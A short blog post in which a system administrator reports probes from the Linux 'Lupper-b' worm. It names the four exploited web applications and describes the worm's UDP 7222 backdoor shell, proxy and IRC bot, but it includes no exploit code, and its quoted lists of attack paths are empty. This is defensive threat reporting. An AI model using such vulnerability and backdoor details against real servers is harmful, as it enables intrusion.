Linux “Lupper-b” Worm
Recently there have been a number of remotely exploitable vulnerabilities for Linux that have been widely used by remote attackers. I see alot of vulnerability probes on machines directly connected to the Internet, the most common probes are for the Awstats and XML-RPC vulnerbilities.
This week I noticed a variation of these probes that indicated something new was afoot. After a bit of googling on the actual wget request used during the probe I discovered there is a new version of the “Lupper” Linux worm on the loose. “Lupper-b” as it is called, uses a quartet of remotely exploitable vulnerabilities to install itself to host systems.
The four vulnerabilities are found in the Awstats, XML-RPC, Webhints and Includer applications. The worm itself carries a proxy server and backdoor shell on UDP port 7222, I have also seen mention of an IRC bot included in some cases.
Interestingly enough, while googling the attack string looking for information I actually googled up a vulnerable server or two (or 50, who’s counting?). All in all it’s a fairly slick worm in that it has a combined exploit capacity and a UDP back door shell.
The paths to vulnerable applications are as follows:
“Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats.pl script at the following locations:
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
Trying to exploit the Webhints vulnerability, the worm attempts to submit its commands to the following scripts:
Trying to exploit the Includer vulnerability, the worm attempts to submit its commands to the following scripts:
A full writeup on the worm is available from Computer Associates, be sure to follow the links on the specific vulnerabilities so you get the full gist of the attack vector.